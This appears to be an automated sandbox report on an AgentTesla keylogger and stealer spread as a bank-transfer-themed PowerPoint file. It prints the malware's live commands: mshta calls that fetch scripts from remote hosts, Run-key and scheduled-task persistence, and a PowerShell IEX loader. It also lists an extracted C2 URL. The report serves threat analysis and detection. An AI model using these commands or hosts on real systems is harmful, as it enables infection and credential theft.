agenttesla | 8d3e1d1a1775191a33980069f500e37f22bdcd0a1ad3544ab4a9d0a651fbd019

General

Target

BankSwiftCopyUSD95000.pps
Size

99KB
MD5

7f0b415d0b7a76530b2f510a910811e5
SHA1

480594ad26c91dd9d719c80334285375540dc83e
SHA256

8d3e1d1a1775191a33980069f500e37f22bdcd0a1ad3544ab4a9d0a651fbd019
SHA512

d9b3320b51f390a6f75e7e3102044557e6476103c94ec4451819b78b4503f8018fee7ce8f70657473b310b14b752935fac2b7e5caaeb318e09a9af317701d8f4

Score

10^/10

agenttesla keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

C2

http://64.188.18.218/webpanel-st/inc/6295ae82aa2db6.php

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

ping.exemshta.exeping.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2252	980	ping.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3120	980	mshta.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3228	980	ping.exe	POWERPNT.EXE

AgentTesla Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2988-30-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla
behavioral2/memory/2988-31-0x00000000004376FE-mapping.dmp	family_agenttesla

Blocklisted process makes network request 8 IoCs

Processes:

mshta.exePowershell.exe

flow pid process

28 3120 mshta.exe
30 3120 mshta.exe
32 3120 mshta.exe
34 3120 mshta.exe
35 3120 mshta.exe
37 3120 mshta.exe
38 3120 mshta.exe
41 2696 Powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

MSBuild.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts MSBuild.exe

flow	pid	process
28	3120	mshta.exe
30	3120	mshta.exe
32	3120	mshta.exe
34	3120	mshta.exe
35	3120	mshta.exe
37	3120	mshta.exe
38	3120	mshta.exe
41	2696	Powershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	MSBuild.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Defeduckgotfucked = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).phuttalylo)\|IEX\"\", 0 : window.close\")"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\mithuiki = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).meather)\|IEX\"\", 0 : window.close\")"	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\checkmatebaby = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta https://backbones1234511a.blogspot.com/p/stback1.html\"\", 0 : window.close\")"	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta https://startthepartyup.blogspot.com/p/backbone14.html\"\", 0 : window.close\")"	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\bukun = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html\"\", 0 : window.close\")"	mshta.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Powershell.exe

description pid process target process

PID 2696 set thread context of 2988 2696 Powershell.exe MSBuild.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	pid	process	target process
PID 2696 set thread context of 2988	2696	Powershell.exe	MSBuild.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2896 schtasks.exe

pid	process
2896	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1620 taskkill.exe
1276 taskkill.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

ping.exeping.exe

pid process

3228 ping.exe
2252 ping.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

980 POWERPNT.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

Powershell.exeMSBuild.exe

pid process

2696 Powershell.exe
2696 Powershell.exe
2696 Powershell.exe
2988 MSBuild.exe
2988 MSBuild.exe

pid	process
1620	taskkill.exe
1276	taskkill.exe

pid	process
3228	ping.exe
2252	ping.exe

pid	process
980	POWERPNT.EXE

pid	process
2696	Powershell.exe
2696	Powershell.exe
2696	Powershell.exe
2988	MSBuild.exe
2988	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

Processes:

taskkill.exetaskkill.exePowershell.exeMSBuild.exe

description	pid	process
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	1276	taskkill.exe
Token: SeDebugPrivilege	2696	Powershell.exe
Token: SeIncreaseQuotaPrivilege	2696	Powershell.exe
Token: SeSecurityPrivilege	2696	Powershell.exe
Token: SeTakeOwnershipPrivilege	2696	Powershell.exe
Token: SeLoadDriverPrivilege	2696	Powershell.exe
Token: SeSystemProfilePrivilege	2696	Powershell.exe
Token: SeSystemtimePrivilege	2696	Powershell.exe
Token: SeProfSingleProcessPrivilege	2696	Powershell.exe
Token: SeIncBasePriorityPrivilege	2696	Powershell.exe
Token: SeCreatePagefilePrivilege	2696	Powershell.exe
Token: SeBackupPrivilege	2696	Powershell.exe
Token: SeRestorePrivilege	2696	Powershell.exe
Token: SeShutdownPrivilege	2696	Powershell.exe
Token: SeDebugPrivilege	2696	Powershell.exe
Token: SeSystemEnvironmentPrivilege	2696	Powershell.exe
Token: SeRemoteShutdownPrivilege	2696	Powershell.exe
Token: SeUndockPrivilege	2696	Powershell.exe
Token: SeManageVolumePrivilege	2696	Powershell.exe
Token: 33	2696	Powershell.exe
Token: 34	2696	Powershell.exe
Token: 35	2696	Powershell.exe
Token: 36	2696	Powershell.exe
Token: SeIncreaseQuotaPrivilege	2696	Powershell.exe
Token: SeSecurityPrivilege	2696	Powershell.exe
Token: SeTakeOwnershipPrivilege	2696	Powershell.exe
Token: SeLoadDriverPrivilege	2696	Powershell.exe
Token: SeSystemProfilePrivilege	2696	Powershell.exe
Token: SeSystemtimePrivilege	2696	Powershell.exe
Token: SeProfSingleProcessPrivilege	2696	Powershell.exe
Token: SeIncBasePriorityPrivilege	2696	Powershell.exe
Token: SeCreatePagefilePrivilege	2696	Powershell.exe
Token: SeBackupPrivilege	2696	Powershell.exe
Token: SeRestorePrivilege	2696	Powershell.exe
Token: SeShutdownPrivilege	2696	Powershell.exe
Token: SeDebugPrivilege	2696	Powershell.exe
Token: SeSystemEnvironmentPrivilege	2696	Powershell.exe
Token: SeRemoteShutdownPrivilege	2696	Powershell.exe
Token: SeUndockPrivilege	2696	Powershell.exe
Token: SeManageVolumePrivilege	2696	Powershell.exe
Token: 33	2696	Powershell.exe
Token: 34	2696	Powershell.exe
Token: 35	2696	Powershell.exe
Token: 36	2696	Powershell.exe
Token: SeDebugPrivilege	2988	MSBuild.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

POWERPNT.EXEMSBuild.exe

pid process

980 POWERPNT.EXE
980 POWERPNT.EXE
2988 MSBuild.exe

pid	process
980	POWERPNT.EXE
980	POWERPNT.EXE
2988	MSBuild.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

POWERPNT.EXEmshta.execmd.exePowershell.exe

description	pid	process	target process
PID 980 wrote to memory of 2252	980	POWERPNT.EXE	ping.exe
PID 980 wrote to memory of 2252	980	POWERPNT.EXE	ping.exe
PID 980 wrote to memory of 3120	980	POWERPNT.EXE	mshta.exe
PID 980 wrote to memory of 3120	980	POWERPNT.EXE	mshta.exe
PID 980 wrote to memory of 3228	980	POWERPNT.EXE	ping.exe
PID 980 wrote to memory of 3228	980	POWERPNT.EXE	ping.exe
PID 3120 wrote to memory of 2696	3120	mshta.exe	Powershell.exe
PID 3120 wrote to memory of 2696	3120	mshta.exe	Powershell.exe
PID 3120 wrote to memory of 2696	3120	mshta.exe	Powershell.exe
PID 3120 wrote to memory of 2896	3120	mshta.exe	schtasks.exe
PID 3120 wrote to memory of 2896	3120	mshta.exe	schtasks.exe
PID 3120 wrote to memory of 2824	3120	mshta.exe	cmd.exe
PID 3120 wrote to memory of 2824	3120	mshta.exe	cmd.exe
PID 2824 wrote to memory of 1620	2824	cmd.exe	taskkill.exe
PID 2824 wrote to memory of 1620	2824	cmd.exe	taskkill.exe
PID 2824 wrote to memory of 1276	2824	cmd.exe	taskkill.exe
PID 2824 wrote to memory of 1276	2824	cmd.exe	taskkill.exe
PID 2696 wrote to memory of 2988	2696	Powershell.exe	MSBuild.exe
PID 2696 wrote to memory of 2988	2696	Powershell.exe	MSBuild.exe
PID 2696 wrote to memory of 2988	2696	Powershell.exe	MSBuild.exe
PID 2696 wrote to memory of 2988	2696	Powershell.exe	MSBuild.exe
PID 2696 wrote to memory of 2988	2696	Powershell.exe	MSBuild.exe
PID 2696 wrote to memory of 2988	2696	Powershell.exe	MSBuild.exe
PID 2696 wrote to memory of 2988	2696	Powershell.exe	MSBuild.exe
PID 2696 wrote to memory of 2988	2696	Powershell.exe	MSBuild.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\BankSwiftCopyUSD95000.pps" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:980

C:\Windows\SYSTEM32\ping.exe
ping.exe
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:2252

C:\Windows\SYSTEM32\mshta.exe
mshta http://1230948%1230948%1230948%[email protected]/dbgghasdnasdjasgdakgsdhv
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3120

C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).meather)|IEX
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2988

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""lunkicharkhi"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta https://randikhanaekminar.blogspot.com/p/st2.html""\"", 0 : window.close"\")
3⤵
- Creates scheduled task(s)
PID:2896

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2824

C:\Windows\system32\taskkill.exe
taskkill /f /im winword.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\system32\taskkill.exe
taskkill /f /im EXCEL.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1276

C:\Windows\SYSTEM32\ping.exe
ping.exe
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:3228

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

Remote System Discovery

1

T1018

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/980-6-0x00007FFA11E00000-0x00007FFA139DD000-memory.dmp

Filesize
27.9MB

Download
memory/980-2-0x00007FFA14480000-0x00007FFA14AB7000-memory.dmp

Filesize
6.2MB

Download
memory/1276-12-0x0000000000000000-mapping.dmp

Download
memory/1620-10-0x0000000000000000-mapping.dmp

Download
memory/2252-3-0x0000000000000000-mapping.dmp

Download
memory/2696-18-0x0000000008350000-0x0000000008351000-memory.dmp

Filesize
4KB

Download
memory/2696-22-0x0000000009A50000-0x0000000009A51000-memory.dmp

Filesize
4KB

Download
memory/2696-29-0x0000000004DD0000-0x0000000004DD8000-memory.dmp

Filesize
32KB

Download
memory/2696-7-0x0000000000000000-mapping.dmp

Download
memory/2696-11-0x0000000073390000-0x0000000073A7E000-memory.dmp

Filesize
6.9MB

Download
memory/2696-28-0x0000000007550000-0x0000000007560000-memory.dmp

Filesize
64KB

Download
memory/2696-13-0x00000000072B0000-0x00000000072B1000-memory.dmp

Filesize
4KB

Download
memory/2696-14-0x0000000007920000-0x0000000007921000-memory.dmp

Filesize
4KB

Download
memory/2696-15-0x0000000007890000-0x0000000007891000-memory.dmp

Filesize
4KB

Download
memory/2696-16-0x0000000007FC0000-0x0000000007FC1000-memory.dmp

Filesize
4KB

Download
memory/2696-17-0x00000000082E0000-0x00000000082E1000-memory.dmp

Filesize
4KB

Download
memory/2696-27-0x000000000B730000-0x000000000B731000-memory.dmp

Filesize
4KB

Download
memory/2696-19-0x0000000008700000-0x0000000008701000-memory.dmp

Filesize
4KB

Download
memory/2696-20-0x0000000008C40000-0x0000000008C41000-memory.dmp

Filesize
4KB

Download
memory/2696-21-0x0000000009690000-0x0000000009691000-memory.dmp

Filesize
4KB

Download
memory/2696-26-0x000000000ABB0000-0x000000000ABB1000-memory.dmp

Filesize
4KB

Download
memory/2696-23-0x000000000A610000-0x000000000A611000-memory.dmp

Filesize
4KB

Download
memory/2696-24-0x000000000A590000-0x000000000A591000-memory.dmp

Filesize
4KB

Download
memory/2696-25-0x000000000A5E0000-0x000000000A5E1000-memory.dmp

Filesize
4KB

Download
memory/2824-9-0x0000000000000000-mapping.dmp

Download
memory/2896-8-0x0000000000000000-mapping.dmp

Download
memory/2988-30-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/2988-31-0x00000000004376FE-mapping.dmp

Download
memory/2988-32-0x0000000073390000-0x0000000073A7E000-memory.dmp

Filesize
6.9MB

Download
memory/2988-36-0x00000000058F0000-0x00000000058F1000-memory.dmp

Filesize
4KB

Download
memory/2988-37-0x0000000005890000-0x0000000005891000-memory.dmp

Filesize
4KB

Download
memory/2988-39-0x0000000006C90000-0x0000000006C91000-memory.dmp

Filesize
4KB

Download
memory/2988-40-0x0000000001660000-0x0000000001661000-memory.dmp

Filesize
4KB

Download
memory/3120-4-0x0000000000000000-mapping.dmp

Download
memory/3228-5-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads